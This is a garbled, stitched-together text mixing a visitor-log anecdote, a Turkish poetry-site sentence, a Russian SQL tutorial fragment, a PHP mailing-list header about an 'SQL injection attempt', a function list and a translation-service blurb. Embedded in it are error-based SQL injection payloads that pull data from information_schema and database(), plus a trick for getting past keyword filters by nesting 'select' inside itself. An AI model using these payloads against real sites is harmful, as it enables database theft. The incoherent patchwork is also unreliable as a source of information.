I kept all logs from visitors with mySQL. Where it from URL and which URL visit. I found this one.
Şair Fdsfa Fdsa Fsdf isimli şaire ait 9785073 or (select 1 from (select count(*),concat((0x574352575653),0x5E,floor(rand(0)*2)) x from information_schema.tables group by x)a) adlı şiiri okumak için bu sayfayı ziyaret edebilirsiniz.
select number, text from test_table union all select number, text from test_table_2. Здесь уже вывелись все строки, так как мы указали union all. А теперь давайте рассмотрим, какие могут быть ошибки даже в этом простом запросе.
... Count Concat Select Select Select Distinct Concat 0x7e 0x27 Unhex Hex Cast Schema Name As Char 0x27 0x7e From Information Schema Schemata Limit 2 1 From ...
To: PHP Database List <php-db@xxxxxxxxxxxxx>. Subject: SQL injection attempt. From: Lester Caine <lester@xxxxxxxxxxx>. Date: Wed, 11 Mar 2015 10:28
...concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1)
like we see [select] is down let's double text [Replacing keywords] like this SeLselectECT.
String Functions ASCII Char Charindex Concat Concat with + Concat_WS Datalength Difference Format
Бесплатный сервис Google позволяет мгновенно переводить слова, фразы и веб-страницы с английского на более чем 100 языков и обратно.